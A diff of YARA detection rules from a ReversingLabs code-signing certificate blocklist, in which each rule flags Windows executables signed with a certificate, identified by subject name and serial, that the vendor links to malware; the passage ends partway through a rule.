-rule REVERSINGLABS_Cert_Blocklist_425Dc3E0Ca8Bcdce19D00D87E3F0Ba28 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Dadf44E4046372313Ee97B8E394C4079 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "df6e1403-c300-5d97-b57d-dc70d61b2229"
+		id = "bebfbbd7-8d42-50a3-8efa-85b641eb069a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12218-L12234"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "67a975f2806825bf0da27fcaf33c2ff497fe9bb2af12c22ff505b49070516960"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5118-L5136"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "170533935b91776ec2413106c55ed4a01c33f32a469a855824cac796f2e132a0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15775,21 +40440,21 @@ rule REVERSINGLABS_Cert_Blocklist_425Dc3E0Ca8Bcdce19D00D87E3F0Ba28 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Protover LLC" and pe.signatures [ i ] . serial == "42:5d:c3:e0:ca:8b:cd:ce:19:d0:0d:87:e3:f0:ba:28" and 1621900800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digital Capital Management Ireland Limited" and ( pe.signatures [ i ] . serial == "00:da:df:44:e4:04:63:72:31:3e:e9:7b:8e:39:4c:40:79" or pe.signatures [ i ] . serial == "da:df:44:e4:04:63:72:31:3e:e9:7b:8e:39:4c:40:79" ) and 1600244736 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Afc0Ddb7Bdc8207E8C3B7204018Eecd3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_F8C2E08438Bb0E9Adc955E4B493E5821 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "73f4d6e2-6924-59fa-8ec1-305f2d5dc5a3"
+		id = "65297530-2482-5773-8914-461fb56cb41d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12236-L12254"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "302e2d6b31ca5c2c33c4ec7294630fd88a9c40f70ddecdc606ccff27b24e1cd4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5138-L5156"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5dbe554032c945c46ffd61ef1e0deb59d396a70dd63994bf44c65d849ec8220a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15799,21 +40464,21 @@ rule REVERSINGLABS_Cert_Blocklist_Afc0Ddb7Bdc8207E8C3B7204018Eecd3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x83\\xB4\\xE5\\xB7\\x9E\\xE8\\x9C\\x97\\xE7\\x89\\x9B\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:af:c0:dd:b7:bd:c8:20:7e:8c:3b:72:04:01:8e:ec:d3" or pe.signatures [ i ] . serial == "af:c0:dd:b7:bd:c8:20:7e:8c:3b:72:04:01:8e:ec:d3" ) and 1629676800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DocsGen Software Solutions Inc." and ( pe.signatures [ i ] . serial == "00:f8:c2:e0:84:38:bb:0e:9a:dc:95:5e:4b:49:3e:58:21" or pe.signatures [ i ] . serial == "f8:c2:e0:84:38:bb:0e:9a:dc:95:5e:4b:49:3e:58:21" ) and 1599523200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_38989Ec61Ecdb7391Ff5647F7D58Ad18 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_70E1Ebd170Db8102D8C28E58392E5632 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1841bbd1-4c7a-5b89-8c63-58d8a3ae1cef"
+		id = "e3b0f68c-8cc9-5275-988a-8d955ea25a47"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12256-L12272"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1795812d4daa458b157280cac7a9b13e9b67a2d78eac077691bbce2bf8aeec34"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5158-L5174"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e1738eddc1da0876a373ee7f35bff155d56c1b98a23cb117c0e7a966f8fa3c92"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15823,21 +40488,21 @@ rule REVERSINGLABS_Cert_Blocklist_38989Ec61Ecdb7391Ff5647F7D58Ad18 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RotA Games ApS" and pe.signatures [ i ] . serial == "38:98:9e:c6:1e:cd:b7:39:1f:f5:64:7f:7d:58:ad:18" and 1613088000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Equal Cash Technologies Limited" and pe.signatures [ i ] . serial == "70:e1:eb:d1:70:db:81:02:d8:c2:8e:58:39:2e:56:32" and 1599264000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Bc6C43D206A360F2D6B58537C456B709 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_09C89De6F64A7Fdf657E69353C5Fdd44 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fd19ce61-056b-549a-946e-72543ff1f7c0"
+		id = "f86eafb5-ec59-58c5-b5f9-01a6704fb555"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12274-L12292"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "eb5288d2b96ff7a7783c2b2b02f9f1168784352ed84ad6463dce00c12daca6cb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5176-L5192"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1cb57cd68cda91754307d2e4d94ea011975bbfff0f15134081a5aa11870b0db1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15847,21 +40512,21 @@ rule REVERSINGLABS_Cert_Blocklist_Bc6C43D206A360F2D6B58537C456B709 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ANKADA GROUP, d.o.o." and ( pe.signatures [ i ] . serial == "00:bc:6c:43:d2:06:a3:60:f2:d6:b5:85:37:c4:56:b7:09" or pe.signatures [ i ] . serial == "bc:6c:43:d2:06:a3:60:f2:d6:b5:85:37:c4:56:b7:09" ) and 1616630400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXON RENTAL SP Z O O" and pe.signatures [ i ] . serial == "09:c8:9d:e6:f6:4a:7f:df:65:7e:69:35:3c:5f:dd:44" and 1601337601 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4929Ab561C812Af93Ddb9758B545F546 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ffff2Ce862378B26440Df49Ca9175B70 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6e8ffb39-d00d-54ca-a4be-68f6dd92d798"
+		id = "d5d1e84d-328f-53ac-adb6-3824fa77a47d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12294-L12310"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "12235e324b92b83e9cfaed7cbcff5d093b8b1d7528dd5ac327159cde6e9a4d1f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5194-L5212"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8ed7b0643b07ce4954f570157e1534ee1ed647717cce00fe7f2b572c9b5d0042"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15871,21 +40536,21 @@ rule REVERSINGLABS_Cert_Blocklist_4929Ab561C812Af93Ddb9758B545F546 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Everything Wow s.r.o." and pe.signatures [ i ] . serial == "49:29:ab:56:1c:81:2a:f9:3d:db:97:58:b5:45:f5:46" and 1594252800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F & A.TIM d.o.o." and ( pe.signatures [ i ] . serial == "00:ff:ff:2c:e8:62:37:8b:26:44:0d:f4:9c:a9:17:5b:70" or pe.signatures [ i ] . serial == "ff:ff:2c:e8:62:37:8b:26:44:0d:f4:9c:a9:17:5b:70" ) and 1576195200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_25C6Dbce3D5499F65D9Df16E9007465D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3223B4616C2687C04865Bee8321726A8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f6d0808d-4748-5b9f-9be2-7753292a6209"
+		id = "089aae56-4f46-563c-800a-dbf57db2bde6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12312-L12328"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "978f05f86734c63afe1e5929a58f3cfff75ef749ffda07252db90b6fe12508ec"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5214-L5230"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fcb0a14866b3612c5ec5a7db7a3333e20a4605695b3d019eef84de85d7b3ea4d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15895,21 +40560,21 @@ rule REVERSINGLABS_Cert_Blocklist_25C6Dbce3D5499F65D9Df16E9007465D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "25:c6:db:ce:3d:54:99:f6:5d:9d:f1:6e:90:07:46:5d" and 1626566400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTUNE STAR TRADING, INC." and pe.signatures [ i ] . serial == "32:23:b4:61:6c:26:87:c0:48:65:be:e8:32:17:26:a8" and 1601337600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Bc6A1812E001362469541108973Bbd52 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7709D2Df39E9A4F7Db2F3Cbc29B49743 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ac5ac6d7-898b-5547-8d35-a483f20edcd6"
+		id = "7227daa3-453d-5bb8-804c-8a97cd0d81c6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12330-L12348"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9b678e9fb1e1eda3ac8e027b5e449af446de4379fea46ef7ff820240c73795ee"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5232-L5248"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c9ade45e0f9fb737a08ffa94d1fff89471a1cbcbacc139730fab88e382226d0b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15919,21 +40584,21 @@ rule REVERSINGLABS_Cert_Blocklist_Bc6A1812E001362469541108973Bbd52 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and ( pe.signatures [ i ] . serial == "00:bc:6a:18:12:e0:01:36:24:69:54:11:08:97:3b:bd:52" or pe.signatures [ i ] . serial == "bc:6a:18:12:e0:01:36:24:69:54:11:08:97:3b:bd:52" ) and 1623801600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Grina LLC" and pe.signatures [ i ] . serial == "77:09:d2:df:39:e9:a4:f7:db:2f:3c:bc:29:b4:97:43" and 1556353331 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Bde1D6Dc3622724F427A39E6A34F5124 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E29690E14518874D2Dcf00234Ae94F1F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6b6958c0-3b43-5c17-9354-d0e2326b97fd"
+		id = "6b4f26d3-b943-5a2e-bfb9-0e290031926a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12350-L12368"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f1cf0b6855269a771447a0b38f4a02996b6527d7df4b143b69598ed591719ca0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5250-L5268"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ef84815798b213dc49a142e3076cc6dd680dccabe72643fc86234024a46468f9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15943,21 +40608,21 @@ rule REVERSINGLABS_Cert_Blocklist_Bde1D6Dc3622724F427A39E6A34F5124 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and ( pe.signatures [ i ] . serial == "00:bd:e1:d6:dc:36:22:72:4f:42:7a:39:e6:a3:4f:51:24" or pe.signatures [ i ] . serial == "bd:e1:d6:dc:36:22:72:4f:42:7a:39:e6:a3:4f:51:24" ) and 1628553600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GRIND & TAMP ENTERPRISES PTY LTD" and ( pe.signatures [ i ] . serial == "00:e2:96:90:e1:45:18:87:4d:2d:cf:00:23:4a:e9:4f:1f" or pe.signatures [ i ] . serial == "e2:96:90:e1:45:18:87:4d:2d:cf:00:23:4a:e9:4f:1f" ) and 1570838400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5C9F5F96726A6E6Fc3B8Bb153Ac82Af2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Cfac705C7E6845904F99995324F7562C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f7619c39-33a0-5f99-b911-9d8a61a4683d"
+		id = "42aa3105-a077-5962-8d5d-50429254582b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12370-L12386"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a61bcc4a90a75a429366e3f93929005b67325eccc6cad3df6b7a0c3692597828"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5270-L5288"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "68bcfe60c2e7154f427c20d0471ede99e55c8200149a4438d5a2a75982fcd419"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15967,21 +40632,21 @@ rule REVERSINGLABS_Cert_Blocklist_5C9F5F96726A6E6Fc3B8Bb153Ac82Af2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "1105 SOFTWARE LLC" and pe.signatures [ i ] . serial == "5c:9f:5f:96:72:6a:6e:6f:c3:b8:bb:15:3a:c8:2a:f2" and 1679061408 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HMWOCFPSDLAFMFZIVD" and ( pe.signatures [ i ] . serial == "cf:ac:70:5c:7e:68:45:90:4f:99:99:53:24:f7:56:2c" or pe.signatures [ i ] . serial == "30:53:8f:a3:81:97:ba:6f:b0:66:66:ac:db:08:a9:d4" ) and 1601918720 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6E889Bb3B7F7194B674C6A0335A608E0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_A7989F8Be0C82D35A19E7B3Dd4Be30E5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d164846d-9552-5108-8b01-1b4b3e7c0b60"
+		id = "21d54d40-442e-50f5-a561-41b3d6239bac"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12388-L12404"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fa2a47f4fb822089fcc958850ce516c8c5d95a6d9b575f3b1d1d4a2ceb2537e4"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5290-L5308"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a50129908a471e6692bcf663abd5ef52861d4a46fdf528f39efe816ee6150edf"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15991,21 +40656,21 @@ rule REVERSINGLABS_Cert_Blocklist_6E889Bb3B7F7194B674C6A0335A608E0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CLEVERCONTROL LLC" and pe.signatures [ i ] . serial == "6e:88:9b:b3:b7:f7:19:4b:67:4c:6a:03:35:a6:08:e0" and 1646956800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Instamix Limited" and ( pe.signatures [ i ] . serial == "00:a7:98:9f:8b:e0:c8:2d:35:a1:9e:7b:3d:d4:be:30:e5" or pe.signatures [ i ] . serial == "a7:98:9f:8b:e0:c8:2d:35:a1:9e:7b:3d:d4:be:30:e5" ) and 1598054400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0F62F760704Bdf8Dc30C7Baa7376F484 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Fa13Ae98E17Ae23Fcfe7Ae873D0C120 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fe326fb9-fe1e-5fc9-8599-6b4cfd6506dd"
+		id = "87a47456-4d90-5a7d-af9d-7a6d5fb8efac"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12406-L12422"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d54d52e116b9404782ce80664f218d2e142577dac672c53c41b82f0466c7375a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5310-L5326"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "415f39f82b6a45acd196ccf246ec660806a8d66c61df8c7d2850e5b244118d04"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16015,21 +40680,21 @@ rule REVERSINGLABS_Cert_Blocklist_0F62F760704Bdf8Dc30C7Baa7376F484 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shanghai XuSong investment partnership Enterprise(Limited)" and pe.signatures [ i ] . serial == "0f:62:f7:60:70:4b:df:8d:c3:0c:7b:aa:73:76:f4:84" and 1659398400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KLAKSON, LLC" and pe.signatures [ i ] . serial == "0f:a1:3a:e9:8e:17:ae:23:fc:fe:7a:e8:73:d0:c1:20" and 1597276801 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_071202Dbfda40B629C5E7Acac947C2D3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3696883055975D571199C6B5D48F3Cd5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4206c383-0e6d-5129-8e6a-05bd54c48e65"
+		id = "f68338f9-8614-5793-981d-70547dbc65ce"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12424-L12440"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cc51b0ae6a59f68e61ee0b4ff33ea0e1ee9ef04e4c994e1c98da6befab62a5b9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5328-L5344"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d6f77b9ca928167341a35b83e353886d4db8dfcecf45cde0f0f93d65059b5200"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16039,21 +40704,21 @@ rule REVERSINGLABS_Cert_Blocklist_071202Dbfda40B629C5E7Acac947C2D3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Crossfire Industries, LLC" and pe.signatures [ i ] . serial == "07:12:02:db:fd:a4:0b:62:9c:5e:7a:ca:c9:47:c2:d3" and 1658620801 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Korist Networks Incorporated" and pe.signatures [ i ] . serial == "36:96:88:30:55:97:5d:57:11:99:c6:b5:d4:8f:3c:d5" and 1600069289 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_98Ab9585C04D7F0E4Cf4De98C14B684D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ee678930D5Bdfaa2Ab0172Fa4C10Ae07 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "445bb30e-e021-5a75-a47e-29fa567acfa5"
+		id = "e2c2c34a-6177-5457-9ed9-fa34f82ee4cd"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12442-L12460"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ba43dd15b13623bb99d88c93fb9e751deb95a546325a1142d9137b25430d07fd"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5346-L5364"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f1e254450fdbe94172a4fa2d2727c3ade5ae436cf4c0c1153a15e9a2f64f2452"
 		score = 75
